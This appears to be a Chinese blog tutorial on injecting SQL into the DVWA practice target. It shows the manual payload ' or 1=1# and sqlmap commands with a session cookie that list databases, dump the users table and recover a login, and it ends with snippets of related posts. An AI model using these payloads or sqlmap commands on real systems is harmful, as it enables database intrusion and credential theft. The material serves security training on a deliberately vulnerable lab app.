DVWA靶機 sql自動注入

2022-04-29 15:33:10 字數 2258 閱讀 2241

1.

使用dvwa靶機進行sql注入實戰(注:當前靶機安全級別為low)

開啟sql漏洞,發現輸入不同的數字會返回不同的資訊,

先嘗試手工判斷是否存在sql注入

一般sql注入語句像這樣,我們構造的是後面兩個單引號裡面的內容

select * from users where userid='

*'

輸入:

'

or 1=1#

前面乙個單引號閉合了查詢語句自帶的第乙個單引號,

or 1=1 使得結果永遠為真,

#則是用來讓查詢忽略後面連線的內容,--和#的作用相同

看到它的確返回了全部內容

這次我們來試試它會不會報錯

提交以後沒有顯示任何東西,推測報錯了

綜上我們可以推測這裡是存在注入點的

2.這裡我的sqlmap是已經裝好的

sqlmap需要python環境才能執行(kali自帶sqlmap,或者也可以windows環境下安裝)

windows下安裝教程:

cmd裡面開啟sqlmap

這裡先別急著貼上url,因為登陸dvwa靶機需要使用者名稱和密碼,所以會有cookie的存在。

我們需要瀏覽器外掛程式檢視cookie(推薦使用火狐瀏覽器)

這些就是當前頁面的cookie,需要放到sqlmap注入語句後面

python sqlmap.py -u"

" --cookie="

phpsessid=8aclj5sdvclvoo6f1c4ft7bfp3;security=low;acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada

" --batch --dbs

這裡簡單解釋一下:--batch自動選擇yes or no;--dbs顯示全部資料庫

結果:

我們只用進dvwa資料庫檢視

列出所有表名:

python sqlmap.py -u"

" --cookie="

phpsessid=8aclj5sdvclvoo6f1c4ft7bfp3;security=low;acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada

" --batch -d dvwa --tables

這裡只看users

列出所有欄位名:

檢視password和user:

拿到使用者名稱和密碼了,回到dvwa登陸頁面試試看

登陸成功

左下角也顯示當前使用者是pablo而不是admin

dvwa系列 sql注入

前言 本篇博文就不詳細講解sql注入的成因了,有興趣的就去看看我sqlilabs的博文吧,我後面會慢慢完成sqlilabs的博文 low我們先來判斷注入點吧,用最常規的單引號試一試,報錯了,初步判斷應該是字元型的單引號注入。下面就推斷一下後台執行的sql語句,因為這是乙個根據輸入的id來查詢資訊的地...

DVWA的入侵SQL注入

前言 在攻擊開始前,我們至少要具備操作mysql的一些簡單語句,否則可能此文章對閱讀者的你存在困難,有朋友問這都什麼年代了還會存在sql注入?其實做這個的時候是因為昨天我編寫 的時候寫出了乙個sql注入並且在上線的時候被朋友挖掘了出來,漏洞圖如下,就因為我的一次邏輯判斷錯誤而導致,所以今天想起了寫一...

MySQL注入試用 DVWA親測SQL注入漏洞

當然,我們也可以使用注釋來注釋後面的單引號 sql中注釋 單行可以使用 忽略 忽略 多行使用 我們試試1 下面我們來利用漏洞獲取資料庫資訊 大概步驟就是 1.猜解所查詢的字段數目 2.獲取字段顯示位 3.通過顯示位獲取資料庫資訊 4.獲取資料庫中的表名 5.獲取表中的列名 字段 6.匯出資料庫中的資...